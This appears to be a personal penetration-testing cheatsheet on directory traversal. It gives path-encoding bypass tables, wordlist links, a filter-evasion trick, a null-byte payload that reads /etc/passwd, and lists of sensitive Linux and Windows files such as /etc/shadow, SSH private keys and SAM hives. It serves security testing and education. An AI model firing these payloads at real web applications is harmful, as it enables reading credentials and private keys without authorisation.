directory-traversal

Cheatsheet Info

Indications of Locations to Test for Directory Traversal

Does the logic/design of the web application indicate it may use this input to specify a file to read?

Example Report ID that returns formatted data - the application might be reading from report_[ID].html files rather than a database.

An input labeled

Does the location contain an unusual file extension that might indicate it is specifying a file to read?

Example page.php?d=data.pdf is referencing /var/www/files/data.pdf

Does the location contain a parameter name that would indicate the value of the parameter is used to specify a file to read?

Example /index.php?file=content is referencing /var/www/content.php

Encoding Reference

Character URL Encoded Double URL Encoded Unicode Overlong UTF-8
. %2e %252e %u002e %c0%2e, %e0%40%ae, %c0%ae
/ %2f %252f %u2215 %c0%af, %e0%80%af, %c0%2f
\ %5c %255c %u2216 %c0%5c, %c0%80%5c

Character	URL Encoded	Double URL Encoded	Unicode	Overlong UTF-8
`.`	`%2e`	`%252e`	`%u002e`	`%c0%2e`, `%e0%40%ae`, `%c0%ae`
`/`	`%2f`	`%252f`	`%u2215`	`%c0%af`, `%e0%80%af`, `%c0%2f`
`\`	`%5c`	`%255c`	`%u2216`	`%c0%5c`, `%c0%80%5c`

Wordlists

https://github.com/swisskyrepo/PayloadsAllTheThings/raw/refs/heads/master/Directory%20Traversal/Intruder/deep_traversal.txt

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/traversals-8-deep-exotic-encoding.txt

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/dotdotpwn.txt

Mangled Path
Sometimes you encounter a WAF which remove the ../ characters from the strings, just duplicate them.
Example
..././
...\.\

File Extension Null Byte Bypass
A null byte (%00) may be able to bypass a server side validation mechanism that mandates a specific file extension.
Example
{{BaseURL}}/wlmeng/../../../../../../etc/passwd%00index.htm

Useful Files - Linux

# OS Info
/etc/issue
/etc/group
/etc/motd
/etc/hosts

# processes
/proc[0-9]*/fd/[0-9]*
/proc/self/environ
/proc/version
/proc/cmdline
/proc/mounts

# current path
/proc/self/cwd/index.php
/proc/self/cwd/main.py

# indexing
/var/lib/mlocate/mlocate.db
/var/lib/plocate/plocate.db
/var/lib/mlocate.db

# credentials and history
/etc/passwd
/etc/shadow
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/etc/mysql/my.cnf

Useful Files - Windows

# proof of concept
C:\Windows\win.ini
C:\windows\system32\license.rtf
 
# other
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system

Related Notes

All Related Notes

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "web") OR contains(tags, "directory-traversal")
SORT file.ctime DESC

web

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "web")
SORT file.ctime DESC

directory-traversal

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "directory-traversal")
SORT file.ctime DESC

📓 Jorkle's Notes

Explorer

directory-traversal

Cheatsheet Info

Graph View

Table of Contents

Backlinks